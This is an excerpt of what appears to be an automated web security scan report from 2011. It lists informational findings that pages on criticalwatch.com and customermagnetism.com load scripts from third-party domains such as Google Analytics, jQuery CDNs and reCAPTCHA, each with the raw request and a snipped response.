X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.42. http://www.criticalwatch.com/company/management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /company/management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company/management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/company/critical-watch-contact.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:08:19 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 15884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.43. http://www.criticalwatch.com/products/mssp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/mssp.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mssp.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-overview.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:05 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.44. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-ips.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/vulnerability-management-ips.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/mssp.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:06 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 13783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.45. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /products/vulnerability-management-overview.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/vulnerability-management-overview.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-resource-library.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:01 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 18958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.46. http://www.criticalwatch.com/solutions/vulnerability-management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /solutions/vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /solutions/vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-scan-trial.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.47. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-resource-library.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/critical-watch-resource-library.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:59 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 9219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.48. http://www.criticalwatch.com/support/critical-watch-support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/critical-watch-support.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/critical-watch-support.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmb=164981229; __utmc=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:54:43 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 8976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.49. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /support/fusionvm-technical-faq.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/fusionvm-technical-faq.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:01:57 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 36003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.50. http://www.criticalwatch.com/vulnerability-management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=164981229.1572272348.1303732829.1303732829.1303732829.1; __utmc=164981229; __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 12:52:24 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="descrip
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.51. http://www.criticalwatch.com/vulnerability-scan-trial.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /vulnerability-scan-trial.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vulnerability-scan-trial.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/products/vulnerability-management-ips.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:02:07 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 30086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin templat
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Le5HQcAAAAAALOm71gVj_YwLY75DVJVpFip8USF">

   </script>
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
24.52. http://www.customermagnetism.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5640f44c05a437bcbee56d65bbd77ffb; path=/
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 28700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Engine
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.customermagnetism.com/css/global.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.53. http://www.customermagnetism.com/case-studies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /case-studies/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /case-studies/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 31470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.customermagnetism.com/css/global.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.54. http://www.customermagnetism.com/free-consultation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /free-consultation/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /free-consultation/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/pay-per-click-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.4.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Mon, 25 Apr 2011 16:23:43 GMT
Vary: Accept-Encoding
Pragma: no-cache
Content-Type: text/html
Content-Length: 22442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.customermagnetism.com/css/global.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
<td style="padding-top: 20px;">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lf15AcAAAAAALJ_IWpanUOS-z3WGXYfYL3WzV4N"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.55. http://www.customermagnetism.com/pay-per-click-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /pay-per-click-services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pay-per-click-services/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.3.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.customermagnetism.com/css/global.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
24.56. http://www.customermagnetism.com/scripts/prettyPhoto/js/jquery.prettyPhoto.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /scripts/prettyPhoto/js/jquery.prettyPhoto.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /scripts/prettyPhoto/js/jquery.prettyPhoto.js HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:27 GMT
Server: Apache
Last-Modified: Thu, 14 Apr 2011 16:12:30 GMT
ETag: "1860913-5b11-4a0e3312e9780"
Accept-Ranges: bytes
Content-Length: 23313
Cache-Control: max-age=7200, private, must-revalidate
Expires: Mon, 25 Apr 2011 18:03:27 GMT
Content-Type: application/javascript

/* ------------------------------------------------------------------------
   Class: prettyPhoto
   Use: Lightbox clone for jQuery
   Author: Stephane Caron (http://www.no-margin-for-errors.com)
   Version:
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
24.57. http://www.customermagnetism.com/seo-faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /seo-faq/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /seo-faq/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:39 GMT
Server: Apache
